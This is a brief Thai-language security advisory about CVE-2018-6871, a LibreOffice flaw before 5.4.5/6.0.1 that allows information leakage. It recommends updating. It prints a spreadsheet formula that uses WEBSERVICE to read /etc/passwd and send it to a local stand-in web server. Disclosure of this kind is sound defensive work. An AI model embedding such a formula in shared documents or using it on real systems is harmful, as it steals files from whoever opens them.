พบช่องโหว่ใน LibreOffice แนะนำให้ update ด่วน
LibreOffice เป็น Software เชิง Office ตัวหนึ่งที่ได้รับความนิยมสำหรับการสร้าง document ต่างๆ ซึ่งเหมือนกับ Microsoft Office ของ Microsoft แต่ LibreOffice นั้นฟรี ล่าสุดพบมีช่องโหว่ทำให้เกิด Information Leakage ได้
LibreOffice นั้น support การใช้งาน web service ด้วย ซึ่งนั่นคือจุดที่ทำให้ถูกนำไปใช้ในการส่งข้อมูลออกมาได้
จากตัวอย่างเป็นการส่งไฟล์ /etc/passwd ไปยัง http://localhost:6000
1 |
=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd")) |
ช่องโหว่นี้ได้รับ CVE เป็น CVE-2018-6871
ผลกระทบ: Information Leakage
ระบบที่ได้รับผลกระทบ: LibreOffice < 5.4.5/6.0.1
วิธีการแก้ไข: Update LibreOffice ให้เป็น version 5.4.5/6.0.1
Source:: @Jollheef